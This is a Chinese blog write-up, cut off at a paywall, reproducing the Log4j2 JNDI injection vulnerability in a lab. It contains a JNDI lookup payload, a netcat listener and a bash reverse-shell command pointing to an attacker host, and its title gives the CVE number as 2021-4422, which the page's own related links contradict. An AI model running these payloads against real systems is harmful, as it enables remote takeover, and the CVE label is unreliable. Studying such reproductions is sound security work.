log4j2漏洞复现

原创 已于 2024-04-20 14:39:28 修改 · 539 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#log4j

于 2024-04-19 20:46:11 首次发布
本文详细描述了Log4j2中的JNDI注入漏洞CVE-2021-4422,涉及LDAP和RMI服务,可导致远程代码执行(RCE)。复现步骤包括DNS验证、payload构建和利用工具的使用。文章还提供了修复建议,如过滤特定字符、限制外部访问和调整jndi配置。

最近一直在搞蓝队所以懈怠了更新,主要还是懒得搬笔记

CVE-2021-4422

漏洞原理:log4j2组件在处理程序日志记录时存在JNDI注入缺陷
详解:
在该框架下的lookup查询服务提供了{}字段解析,故payload为${jndi:ldap:恶意url},JNDI会去对对应的服务(如:LDAP、DNS等)查找资源,本例调用LDAP服务,<font color="#f79646">由于对lookup的出栈无限制</font>,导致最终指向攻击者站点,下载远程恶意class文件,最终导致远程rce。
漏洞价值:任意RCE
漏洞利用:LDAP(目录访问协议),RMI(分布式对象应用)

PS:JNDI(java命名和目录接口)用于目录管理,通过名称调用接口

漏洞复现

靶机:192.168.245.1xx
攻击机:192.168.245.1oo

1.DNSlog验证漏洞

payload=\${jndi:ldap\://\${sys:java.version}.DNS地址}

2.攻击机监听端口 7777

nc -lvvp 7777

3.将bash反弹shell命令编码 base64

<font color="#f79646">bash -i >& /dev/tcp/192.168.245.1oo/7777 0>&1</font>
解释:
- bash:启动bash shell
- -i:开启交互式shell会话,允许用户命令输入和获取输出
- >& /dev/tcp/攻击机IP:将输出重定向,将建立一个与该IP和端口相连接的网络套接字,将输出发送至该连接
- 0>&1:输入和输出将通过网络套接字传输

4.使用JNDIexploit进行漏洞利用(注入工具)

poc注意要有

最低0.47元/天 解锁文章
The_Epiphany
关注
Log4j2漏洞复现
hongji728696的博客
09-09 2069
Log4j2是一个用来记录日志的日志记录框架,log4j2在进行日志记录时实现了一个接口JNDI(),接口实现的是lookup方法,该方法具备远程加载对象并将对象动态记录下来的功能,记录的格式是${......},如果不对lookup的记录内容进行限制,就容易被攻击者渗透,并反弹shell。
Log4j2的JNDI注入漏洞原理分析与思考
m0_69745415的博客
05-05 613
因为存在前身Log4j,而且都是Apache下的项目,不管是jar包名称还是package名称,看起来都很相似,导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法: Log4j2分为2个jar包,一个是接口 log4j-api-版本号.jar ,一个是具体实现 log4j−core−{版本号}.jar ,一个是具体实现 log4j-core-版本号.jar ,一个是具体实现 log4j−core−{版本号}.j
Apache Log4j2程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)且 pom.xml文件中是slf4j-log4j12依赖的漏洞修复
weixin_45222548的博客
07-24 1239
CVE-2021-45105/CVE-2021-44228漏洞且 pom.xml文件中是slf4j-log4j12依赖的系统修复。
log4j2 变量注入漏洞(CVE-2021-44228)
最新发布
weixin_40443268的博客
12-04 306
log4j2 JNDI注入漏洞(CVE-2021-44228) 概述 本文非常详细的从头到尾debug了CVE-2021-44228漏洞的利用过程,喜欢的师傅记得点个推荐~ Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志...
关于 CVE-2021-44228 Log4j2 漏洞的相关应对汇总说明(包含中英文客户公告)
Hsiao的二进制生活
12-14 1008
Apache Log4j2是一款非常优秀的Java日志框架,它在各大交易所、钱包、DeFi项目中广泛使用。12月9日,Apache官方发布了紧急安全更新,修复了Apache Log4j2中发现的远程代码执行漏洞。 以下是漏洞详情: 漏洞详情:https://github.com/apache/logging-log4j2 Apache Log4j 远程代码执行漏洞 严重程度: 严重 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,
Log4j2漏洞CVE-2021-44228)原理(代码&易懂)
weixin_63350467的博客
11-19 1998
大家第一次见到这个漏洞的名字 Log4j2漏洞,第一时间肯定会疑惑。一般情况下,log日志就是为了方便出问题的时候查看问题出在哪里。为什么会出现这个漏洞呢?罪魁祸首就是JNDI(Java Naming and Directory Interface ) JAVA命名和目录接口我先解释一下JNDI的定义命名服务是一种用于将名称与对象绑定的服务。比如,将一个名称(如)绑定到一个具体对象(如数据库连接池实例)。通过命名服务,应用可以通过名称查找到对应的资源。
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 1112
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 828
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.22.12.3 和 2.3
Log4j2漏洞(一)原理和dnslog验证
02-06 2720
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
CVE-2021-44228 Log4j 复现及原理
weixin_45260839的博客
05-08 2228
CVE-2021-44228 Log4j 复现及原理
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 2万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4j2 远程代码执行漏洞cve-2021-44228)原理剖析
Hi~ 土拨鼠
12-17 6481
文章目录1、JNDI、RMI、LDAP、JNDI注入?Log4j2 rce原理影响版本修复思路 要了解本次Log4j2 rce的原理,首先我们得知道什么是JNDI,什么是JNDI注入,什么是RMI,什么又是LDAP… 本文中只讲原理,具体复现请转至:Log4j2 远程代码执行漏洞cve-2021-44228)复现(反弹shell) 1、JNDI、RMI、LDAP、JNDI注入? Java Name and Directory Interface:java命名和目录接口 是sun公司提供的一种标准的java
Security Bulletin_Vulnerability in Apache Log4j affects WAS_CVE-2021-44228
hbhe0316的专栏
12-13 188
Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)Security Bulletin https://www.cndba.cn/hbhe0316/article/22790 SummaryThere is a vul...
漏洞预警】Apache Log4j2 远程代码执行漏洞CVE-2021-44228)
明哥哥知识分享
12-13 1753
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新至 Apache Log4j 2.15.0-rc2 版本。 漏洞描述 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现漏洞分析都是基..
(环境搭建+复现CVE-2021-44228 Apache Log4j 远程代码执行漏洞
daxi0ng的博客
12-10 2万+
0x00 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 0x01 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 0x02 影响范围 Apache Log4j 2.x <= 2.15.0-rc1 0x02环境搭建 1、创建一个新的maven项目,并导入Log4j的依赖包 <depe...
log4j2-rce-cve-2021-44228 漏洞复现
weicanh的博客
04-29 381
log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.22.12.3 和 2.3.1)开始,此功能已被完全删除。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值